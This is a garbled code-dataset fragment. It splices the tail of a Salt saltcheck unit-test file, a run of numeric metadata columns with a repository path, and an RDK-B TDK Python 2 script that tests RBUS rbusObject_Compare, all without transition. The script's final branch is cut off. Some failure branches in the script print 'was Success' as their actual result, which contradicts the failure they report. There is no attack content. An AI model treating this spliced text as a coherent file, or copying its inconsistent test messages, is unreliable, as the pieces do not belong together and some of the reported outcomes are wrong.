'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 99
bbb = 100
mybool = sc_instance._SaltCheck__assert_less(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_less2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 99
mybool = sc_instance._SaltCheck__assert_less(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_less3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_less(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_less_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 99
bbb = 100
mybool = sc_instance._SaltCheck__assert_less_equal(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_less_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 99
mybool = sc_instance._SaltCheck__assert_less_equal(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_less_equal3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_less_equal(aaa, bbb)
self.assertEqual(mybool, 'Pass')
def test__assert_empty(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_empty("")
self.assertEqual(mybool, 'Pass')
def test__assert_empty_fail(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_empty("data")
self.assertNotEqual(mybool, 'Pass')
def test__assert__not_empty(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_not_empty("data")
self.assertEqual(mybool, 'Pass')
def test__assert__not_empty_fail(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_not_empty("")
self.assertNotEqual(mybool, 'Pass')
def test_run_test_1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'sys.list_modules': MagicMock(return_value=['test']),
'sys.list_functions': MagicMock(return_value=['test.echo']),
'cp.cache_master': MagicMock(return_value=[True])}):
returned = saltcheck.run_test(test={"module_and_function": "test.echo",
"assertion": "assertEqual",
"expected-return": "This works!",
"args": ["This works!"]
})
self.assertEqual(returned['status'], 'Pass')
| 46.150134
| 105
| 0.520274
| 1,584
| 17,214
| 5.299242
| 0.092803
| 0.119728
| 0.159638
| 0.177269
| 0.848463
| 0.844174
| 0.821658
| 0.809269
| 0.804027
| 0.782106
| 0
| 0.010167
| 0.3715
| 17,214
| 372
| 106
| 46.274194
| 0.76569
| 0.023992
| 0
| 0.734694
| 0
| 0
| 0.0739
| 0.001504
| 0
| 0
| 0
| 0
| 0.302721
| 1
| 0.112245
| false
| 0.02381
| 0.027211
| 0
| 0.146259
| 0.003401
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40c7e8d4f0b8cbf8e154f811bc4bc61e00ff6777
| 38,449
|
py
|
Python
|
testscripts/RDKB/component/RBUS/TS_RBUS_Object_Compare_With_Different_Properties.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/RBUS/TS_RBUS_Object_Compare_With_Different_Properties.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/RBUS/TS_RBUS_Object_Compare_With_Different_Properties.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version='1.0' encoding='utf-8'?>
<xml>
<id></id>
<!-- Do not edit id. This will be auto filled while exporting. If you are adding a new script keep the id empty -->
<version>6</version>
<!-- Do not edit version. This will be auto incremented while updating. If you are adding a new script you can keep the vresion as 1 -->
<name>TS_RBUS_Object_Compare_With_Different_Properties</name>
<!-- If you are adding a new script you can specify the script name. Script Name should be unique same as this file name with out .py extension -->
<primitive_test_id> </primitive_test_id>
<!-- Do not change primitive_test_id if you are editing an existing script. -->
<primitive_test_name>RBUS_ObjectCommands</primitive_test_name>
<!-- -->
<primitive_test_version>1</primitive_test_version>
<!-- -->
<status>FREE</status>
<!-- -->
<synopsis>To Validate the RBUS 2.0 API rbusObject_Compare by setting different properties for the RBUS Object</synopsis>
<!-- -->
<groups_id />
<!-- -->
<execution_time>15</execution_time>
<!-- -->
<long_duration>false</long_duration>
<!-- -->
<advanced_script>false</advanced_script>
<!-- execution_time is the time out time for test execution -->
<remarks></remarks>
<!-- Reason for skipping the tests if marked to skip -->
<skip>false</skip>
<!-- -->
<box_types>
<box_type>Broadband</box_type>
<!-- -->
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
<!-- -->
</rdk_versions>
<test_cases>
<test_case_id>TC_RBUS_67</test_case_id>
<test_objective>To Validate the RBUS 2.0 API rbusObject_Compare by setting different properties for the RBUS Object
</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1. Ccsp Components should be in a running state of DUT
2. TDK Agent should be in running state or invoke it through StartTdk.sh script
3. The DUT should be in RBUS mode</pre_requisite>
<api_or_interface_used>rbusObject_Compare
</api_or_interface_used>
<input_parameters>N/A</input_parameters>
<automation_approch>1. Open the RBUS connection using rbus_open API
2. Initiate the RBUS value using rbusValue_Init and set string value to it using rbusValue_Init API
3. Initiate the RBUS property using rbusProperty_Init with rbus value from step 2 and release the RBUS value using rbusValue_Release API
4. Repeat step 2 and 3 for Property 2 initialization.
5. Initiate 4 different Objects (two parent objects and two child objects) using rbusObject_Init API
6. Set the Property for the Object using rbusObject_SetProperty API
7. set properties combination should be - (Parent obj1 and property1), (parent obj2 and property2) , (child obj1 and property1 ) and (child obj2 and property2)
8. Release the properties using rbusProperty_Release API
9. Set the children to the Object using rbusObject_SetChildren API, the combination was (parent obj1 and child obj1 ) and (parent obj2 and child obj2)
10.Compare the Objects using rbusObject_Compare , the return status should be success and value should be zero
11.Initiate the rbus value again and set same string value to it using rbusValue_Init and rbusValue_SetFromString APIs
12.Initiate the Property (prop 2) with different property name using rbusProperty_Init and release the RBUS value using rbusValue_Release
13.Set the Property for child object 2 with the new property using rbusObject_SetProperty API
14.Release the RBUS Property using rbusProperty_Release
15.Compare the Objects again using rbusObject_Compare the return value should be equal to -1.
16.Release all the objects using rbusObject_Release API and return status should be success
17.Close the RBUS Connection using rbus_close API</automation_approch>
<expected_output>rbusObject_Compare should return -1 for object with different properties</expected_output>
<priority>High</priority>
<test_stub_interface>rbus</test_stub_interface>
<test_script>TS_RBUS_Object_Compare_With_Different_Properties</test_script>
<skipped>No</skipped>
<release_version>M84</release_version>
<remarks>None</remarks>
</test_cases>
<script_tags />
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("rbus","1");
#IP and Port of box, No need to change,
#This will be replaced with correspoing Box Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_RBUS_Object_Compare_With_Different_Properties');
#Get the result of connection with test component and DUT
loadmodulestatus =obj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus ;
if "SUCCESS" in loadmodulestatus.upper() :
obj.setLoadModuleStatus("SUCCESS");
obj_name = "gTestObject"
prop_name = "gTestProp1"
print "\n********** Step 1: Open the RBUS connection ****************"
tdkTestObj = obj.createTestStep('RBUS_Open');
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
print "RBUS Open Detail is ",details
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Open the RBUS connection";
print "EXPECTED RESULT 1: rbus_open Should be success";
print "ACTUAL RESULT 1: rbus_open was success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
for count in range (1,3):
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Init");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Initiate rbusValue_Init function";
print "EXPECTED RESULT 2: rbusValue_Init should be success";
print "ACTUAL RESULT 2: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
value_to_set = "string1"
print "Value to be set for RBUSValue is ",value_to_set
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusValue_SetFromString");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name",value_to_set);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 3: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 3: rbusValue_SetFromString was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
print "Initialize the Property prop%d with property name %s" %(count,prop_name);
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Init");
tdkTestObj.addParameter("prop_count",count);
tdkTestObj.addParameter("property_name",prop_name);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Validate rbusProperty_Init function";
print "EXPECTED RESULT 4: rbusProperty_Init should be success";
print "ACTUAL RESULT 4: rbusProperty_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Release");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 5: Initiate rbusValue_Release function";
print "EXPECTED RESULT 5: rbusValue_Release should be success";
print "ACTUAL RESULT 5: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 5: Initiate rbusValue_Release function";
print "EXPECTED RESULT 5: rbusValue_Release should be success";
print "ACTUAL RESULT 5: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Validate rbusProperty_Init function";
print "EXPECTED RESULT 4: rbusProperty_Init should be success";
print "ACTUAL RESULT 4: rbusProperty_Init was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 3: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 3: rbusValue_SetFromString was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Initiate rbusValue_Init function";
print "EXPECTED RESULT 2: rbusValue_Init should be success";
print "ACTUAL RESULT 2: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "\n *************** Start of RBUS Object Init Function **********************"
for count1 in range (1,5):
print "count1 is ",count1
if count1 == 1 or count1 == 2:
obj_name = "gTestObject1";
else:
obj_name = "gTestObject_ch1"
print "Initialize the RBUS Object obj%d with Object name %s" %(count1,obj_name);
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Init");
tdkTestObj.addParameter("obj_count",count1);
tdkTestObj.addParameter("object_name",obj_name);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 6: Initiate rbusObject_Init function";
print "EXPECTED RESULT 6: rbusObject_Init should be success";
print "ACTUAL RESULT 6: rbusObject_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 6: Initiate rbusObject_Init function";
print "EXPECTED RESULT 6: rbusObject_Init should be success";
print "ACTUAL RESULT 6: rbusObject_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Object Init Function **********************"
print "\n *************** Start of RBUS Object Set Property Function **********************"
for count2 in range (1,5):
print "Set the Property to the Object Obj%d" %count2
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_SetProperty");
tdkTestObj.addParameter("obj_count",count2);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 7: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 7: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 7: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 7: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 7: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 7: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Object Set Property Function **********************"
print "\n *************** Start of RBUS Property Release Function **********************"
for count3 in range (1,3):
print "Release the Property prop%d" %count3
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Release");
tdkTestObj.addParameter("prop_count",count3);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 8: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 8: rbusProperty_Release should be success";
print "ACTUAL RESULT 8: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 8: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 8: rbusProperty_Release should be success";
print "ACTUAL RESULT 8: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Property Release Function **********************"
print "\n *************** Start of RBUS Object Set Children Function **********************"
for count4 in range (1,3):
print "Set Children for the Object obj%d" %count4
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_SetChildren");
tdkTestObj.addParameter("obj_count",count4);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 9: Initiate rbusObject_SetChildren function";
print "EXPECTED RESULT 9: rbusObject_SetChildren should be success";
print "ACTUAL RESULT 9: rbusObject_SetChildren was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 9: Initiate rbusObject_SetChildren function";
print "EXPECTED RESULT 9: rbusObject_SetChildren should be success";
print "ACTUAL RESULT 9: rbusObject_SetChildren was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Property Release Function **********************"
comp_flag = 0;
print "\n *************** Start of RBUS Object Compare Function **********************"
print "Compare the Objects obj1 and obj2"
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Compare");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
compare_value = tdkTestObj.getResultDetails();
print "RBUS Object Compare details is ",compare_value
if expectedresult in actualresult and int(compare_value) == 0:
comp_flag = 1;
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 10: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 10: rbusObject_Compare should be success";
print "ACTUAL RESULT 10: rbusObject_Compare was Success, and value retrieved was zero";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 10: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 10: rbusObject_Compare should be success";
print "ACTUAL RESULT 10: rbusObject_Compare was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Object Compare Function **********************"
if comp_flag == 1:
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Init");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 11: Initiate rbusValue_Init function";
print "EXPECTED RESULT 11: rbusValue_Init should be success";
print "ACTUAL RESULT 11: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
value_to_set1 = "string1"
print "Value to be set for RBUSValue is ", value_to_set1
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusValue_SetFromString");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name",value_to_set1);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 12: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 12: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 12: rbusValue_SetFromString was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
print "\n********** Start of RBUS Property Init ****************"
prop_name1 = "gTestProp2"
print "Initialize the property prop2 with property name ",prop_name1
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Init");
tdkTestObj.addParameter("prop_count",2);
tdkTestObj.addParameter("property_name",prop_name1);
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 13: Validate rbusProperty_Init function";
print "EXPECTED RESULT 13: rbusProperty_Init should be success";
print "ACTUAL RESULT 13: rbusProperty_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusValue_Release");
tdkTestObj.addParameter("prop_count",1);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 14: Initiate rbusValue_Release function";
print "EXPECTED RESULT 14: rbusValue_Release should be success";
print "ACTUAL RESULT 14: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
print "Set the Property to Obj4 with Prop2 (with new values updated)"
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_SetProperty");
tdkTestObj.addParameter("obj_count",4);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 15: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 15: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 15: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "Release the Property prop2"
tdkTestObj = obj.createTestStep('RBUS_PropertyCommands');
tdkTestObj.addParameter("operation","rbusProperty_Release");
tdkTestObj.addParameter("prop_count",2);
tdkTestObj.addParameter("property_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 16: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 16: rbusProperty_Release should be success";
print "ACTUAL RESULT 16: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "\n *************** Start of RBUS Object Compare Function **********************"
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Compare");
tdkTestObj.addParameter("obj_count",1);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
neg_comp_value = tdkTestObj.getResultDetails();
print "RBUS Object Compare details is ",neg_comp_value
if expectedresult in actualresult and int(neg_comp_value) != 0:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 17: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 17: rbusObject_Compare should Not be equal to Zero";
print "ACTUAL RESULT 17: rbusObject_Compare value was not equal to Zero";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 17: Initiate rbusObject_Compare function";
print "EXPECTED RESULT 17: rbusObject_Compare should Not be equal to Zero";
print "ACTUAL RESULT 17: rbusObject_Compare value was Equal to Zero";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print " *************** End of RBUS Object Compare Function **********************\n"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 16: Initiate rbusProperty_Release function";
print "EXPECTED RESULT 16: rbusProperty_Release should be success";
print "ACTUAL RESULT 16: rbusProperty_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 15: Initiate rbusObject_SetProperty function";
print "EXPECTED RESULT 15: rbusObject_SetProperty should be success";
print "ACTUAL RESULT 15: rbusObject_SetProperty was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 14: Initiate rbusValue_Release function";
print "EXPECTED RESULT 14: rbusValue_Release should be success";
print "ACTUAL RESULT 14: rbusValue_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 13: Validate rbusProperty_Init function";
print "EXPECTED RESULT 13: rbusProperty_Init should be success";
print "ACTUAL RESULT 13: rbusProperty_Init was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 12: Initiate rbusValue_SetFromString function";
print "EXPECTED RESULT 12: rbusValue_SetFromString should be success";
print "ACTUAL RESULT 12: rbusValue_SetFromString was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s \n" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 11: Initiate rbusValue_Init function";
print "EXPECTED RESULT 11: rbusValue_Init should be success";
print "ACTUAL RESULT 11: rbusValue_Init was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** Start of RBUS Property Release Function **********************"
for count5 in range (1,5):
print "Release the RBUS Object obj%d" %count5
tdkTestObj = obj.createTestStep('RBUS_ObjectCommands');
tdkTestObj.addParameter("operation","rbusObject_Release");
tdkTestObj.addParameter("obj_count",count5);
tdkTestObj.addParameter("object_name","dummy");
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 18: Initiate rbusObject_Release function";
print "EXPECTED RESULT 18: rbusObject_Release should be success";
print "ACTUAL RESULT 18: rbusObject_Release was Success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 18: Initiate rbusObject_Release function";
print "EXPECTED RESULT 18: rbusObject_Release should be success";
print "ACTUAL RESULT 18: rbusObject_Release was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "*************** End of RBUS Property Release Function **********************"
print "\n********** Start of RBUS Close ****************"
tdkTestObj = obj.createTestStep('RBUS_Close');
expectedresult = "SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
print "RBUS close Detail is ",details
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 19: Close the RBUS connection";
print "EXPECTED RESULT 19: rbus_close should be success";
print "ACTUAL RESULT 19: rbus_close was success";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 19: Close the RBUS connection";
print "EXPECTED RESULT 19: rbus_close should be success";
print "ACTUAL RESULT 19: rbus_close was Failed";
